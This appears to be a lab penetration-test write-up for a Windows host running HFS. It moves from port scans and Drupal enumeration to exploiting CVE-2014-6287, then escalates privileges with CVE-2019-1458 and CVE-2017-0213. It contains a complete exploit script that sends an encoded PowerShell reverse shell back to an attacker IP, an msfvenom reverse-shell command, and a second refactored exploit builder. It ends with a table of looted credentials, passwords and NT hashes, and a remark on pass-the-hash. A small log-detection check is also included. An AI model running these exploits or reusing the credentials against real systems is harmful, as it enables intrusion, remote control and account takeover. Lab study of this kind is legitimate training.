Port-scan the target.

Pasted_image_20240731220804.png

The web application is Drupal 7; scan it with droopescan scan drupal -u http://10.11.1.50/
Pasted_image_20240731220927.png

The public payloads for this Drupal 7 version are all SQL injection, but the site does not accept the POST method.
A second scan of all ports turned up a new port:
Pasted_image_20240731221011.png

It is an HFS (HTTP File Server) instance.
Pasted_image_20240731221128.png

The files in the Alice's Stuff folder give several usernames: Ann, Lee, Bethany, Nick, Pedro
Pasted_image_20240731221230.png

The Bethany's Files folder holds a password/username wordlist
Pasted_image_20240731221321.png

and a Holiday_Locations.txt file.
Pasted_image_20240731221357.png

Use the HFS command-execution vulnerability (CVE-2014-6287): https://www.abotaku.cn/archives/108.html
Pasted_image_20240731221445.png

List the system users:
Pasted_image_20240731221523.png

Read the password entries in the HFS configuration file; they could not be decrypted.
Pasted_image_20240731221606.png

Generate a reverse-shell executable with msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.212 LPORT=8780 -f exe -o reve.exe
First download the file onto the target
Pasted_image_20240731221700.png

The download has completed
Pasted_image_20240731221751.png

Use the following script (the Exploit-DB PoC for CVE-2014-6287, with comments added) to get a reverse shell. It injects a PowerShell TCP reverse shell through HFS's exec macro:

#!/usr/bin/python3
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands

import base64
import os
import urllib.request
import urllib.parse

lhost = "192.168.45.196"   # attacker address the shell connects back to
lport = 80                 # attacker port (nc listens here)
rhost = "10.11.1.50"       # HFS host
rport = 9505               # HFS port found by the full port scan

# PowerShell TCP reverse shell. Doubled braces are f-string escapes for literal { and }.
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'

# powershell.exe -EncodedCommand expects base64 over UTF-16LE, not UTF-8
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")

# HFS scripting macro: {.exec|<command line>.} runs the command line on the server
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'

# The leading %00 (NUL) makes HFS's macro-marker check (findMacroMarker) miss the
# {. ... .} that follows it, so the macro reaches the scripting engine unfiltered.
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target...")

# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)

# Listen for the callback. nc is started after the request has been sent; this works
# in practice only because powershell.exe takes longer to start than nc does, so a
# listener started beforehand is the more reliable choice.
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')

Received the reverse shell

Pasted_image_20240731221858.png
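The same CVE-2014-6287 request, factored into reusable functions as an added example (this is not the writeup's or Exploit-DB's code). It separates the three things the PoC above does in one go: the UTF-16LE/base64 encoding that -EncodedCommand requires, the {.exec|....} macro wrapped behind the %00 byte, and the listener, which here is started before the request is sent. It also adds a small check that flags such a request when seen in a proxy or web log. Host and port values are placeholders; the PowerShell one-liner is assumed to be the same TCP reverse shell as in the PoC.

```python
#!/usr/bin/env python3
"""CVE-2014-6287 (HFS 2.3.x) request builder plus a matching log check.

Added example, not the original PoC. Hosts/ports below are placeholders.
"""
import base64
import subprocess
import sys
import time
import urllib.parse
import urllib.request


def powershell_reverse_shell(lhost: str, lport: int) -> str:
    """Plain PowerShell TCP reverse shell, same shape as the one-liner in the PoC."""
    return (
        f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});'
        '$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};'
        'while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){'
        '$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);'
        '$sendback = (Invoke-Expression $data 2>&1 | Out-String);'
        '$sendback2 = $sendback + "PS " + (Get-Location).Path + "> ";'
        '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);'
        '$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    )


def encode_powershell(command: str) -> str:
    """powershell.exe -EncodedCommand takes base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell: recover what a captured -EncodedCommand runs."""
    return base64.b64decode(encoded).decode("utf-16le")


def build_exploit_url(rhost: str, rport: int, command_line: str) -> str:
    """GET /?search=%00{.exec|<command line>.}

    The NUL byte stops HFS's macro-marker check short, so the {. ... .} macro
    after it is evaluated by the scripting engine instead of being neutralised.
    Only the macro body is percent-encoded; the {. and .} markers stay literal.
    """
    inner = urllib.parse.quote_plus("exec|" + command_line)
    return f"http://{rhost}:{rport}/?search=%00{{.{inner}.}}"


def is_hfs_macro_injection(raw_url: str) -> bool:
    """Defender-side check: does the query string carry an HFS macro after decoding?"""
    query = urllib.parse.urlsplit(raw_url).query
    decoded = urllib.parse.unquote_plus(query)
    return "{." in decoded and ".}" in decoded


if __name__ == "__main__":
    lhost, lport = "192.168.45.196", 80   # placeholder attacker host/port
    rhost, rport = "10.11.1.50", 9505     # placeholder HFS host/port
    ps_cmdline = (
        "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "
        "-WindowStyle Hidden -EncodedCommand "
        + encode_powershell(powershell_reverse_shell(lhost, lport))
    )
    url = build_exploit_url(rhost, rport, ps_cmdline)
    # Listener first: the shell connects back as soon as powershell.exe is up.
    listener = subprocess.Popen(["nc", "-nlvp", str(lport)])
    time.sleep(1)
    try:
        urllib.request.urlopen(url, timeout=10)
    except Exception as exc:  # HFS may not answer cleanly once the macro has run
        print(f"request finished with: {exc!r}", file=sys.stderr)
    listener.wait()
```

decode_powershell is the function to reach for when triaging: paste the -EncodedCommand blob from a proxy log into it and the PowerShell source comes back; is_hfs_macro_injection catches the request shape regardless of which command was wrapped in the macro.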

More than 100 hotfixes are installed
Pasted_image_20240731221934.png

Escalate privileges with CVE-2019-1458: https://github.com/unamer/CVE-2019-1458
Pasted_image_20240731222012.png

Annoyingly, it only works once
Pasted_image_20240731222046.png

Escalate with a different bug instead, CVE-2017-0213: https://github.com/zcgonvh/CVE-2017-0213
Pasted_image_20240731222548.png

Got the contents of proof.txt: 1f1f1eb58e44d5d24e44070b3b29c0d5
Pasted_image_20240731222650.png

Loot

Collected credentials:

Account        NT hash                           Password
Administrator  31d6cfe0d16ae931b73c59d7e0c089c0  (empty; this is the well-known NT hash of an empty password)
alice          b74242f37e47371aff835a6ebcac4ffe  aliceishere
Bethany        15a32e36e8612d886be1b8981d9679ee  ihavepasswords3
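An added check, not part of the original writeup: recompute the NT hashes locally to confirm which hash/password pairs in the table actually agree before reusing them. An NT hash is MD4 over the UTF-16LE encoding of the password; MD4 is implemented inline because hashlib's md4 is frequently unavailable on OpenSSL 3 builds. The table below is the one from the writeup, copied in as constructed input; the Administrator row is the empty-password hash and verifies, the other two rows are checked the same way.

```python
#!/usr/bin/env python3
"""Verify loot hash/password pairs by recomputing NT hashes (MD4 over UTF-16LE)."""
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 per RFC 1320 (three rounds of 16 steps per 512-bit block)."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    # Padding: 0x80, zeros to 56 mod 64, then the bit length as 64-bit little-endian.
    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = [
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for off in range(0, len(msg), 64):
        x = list(struct.unpack("<16I", msg[off:off + 64]))
        r = state[:]
        for fn, k, shifts, order in rounds:
            for i in range(16):
                idx = (-i) % 4            # register updated this step: a, d, c, b, a, ...
                p, q, s = r[(idx + 1) % 4], r[(idx + 2) % 4], r[(idx + 3) % 4]
                r[idx] = rotl((r[idx] + fn(p, q, s) + x[order[i]] + k) & 0xFFFFFFFF,
                              shifts[i % 4])
        state = [(a + b) & 0xFFFFFFFF for a, b in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lowercase hex as hashdump/mimikatz print it."""
    return md4(password.encode("utf-16le")).hex()


# Constructed input: the credential table from the writeup (account, NT hash, password).
LOOT = [
    ("Administrator", "31d6cfe0d16ae931b73c59d7e0c089c0", ""),
    ("alice", "b74242f37e47371aff835a6ebcac4ffe", "aliceishere"),
    ("Bethany", "15a32e36e8612d886be1b8981d9679ee", "ihavepasswords3"),
]


def verify_loot(rows=LOOT) -> dict:
    """Map each account to True when the claimed password reproduces the NT hash."""
    return {acct: nt_hash(pw) == h.lower() for acct, h, pw in rows}


if __name__ == "__main__":
    for acct, ok in verify_loot().items():
        print(f"{acct:14} {'hash matches password' if ok else 'MISMATCH'}")
```

A row that reports MISMATCH means the password came from somewhere else (a reused credential, a wordlist hit on a different account) and should not be assumed to unlock that account; the hash itself can still be used for pass-the-hash against SMB/WinRM where NTLM is accepted.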